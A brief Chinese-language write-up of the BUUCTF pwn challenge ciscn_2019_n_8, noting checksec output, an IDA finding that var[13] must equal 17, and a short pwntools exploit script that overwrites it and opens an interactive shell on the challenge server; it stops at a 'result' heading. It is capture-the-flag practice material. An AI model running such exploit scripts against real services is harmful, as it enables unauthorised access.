BUUCTF-PWN-ciscn_2019_n_8

checksec

新手小白表示第一次碰到保护全开，有点震惊

IDA

看完IDA反向震惊，似乎只要var[13] == 17就好了

EXP

from pwn import *

p = remote('node4.buuoj.cn', 26178)

payload = b'aaaa' * 13 + p32(17)

p.sendlineafter('\n', payload)

p.interactive()

结果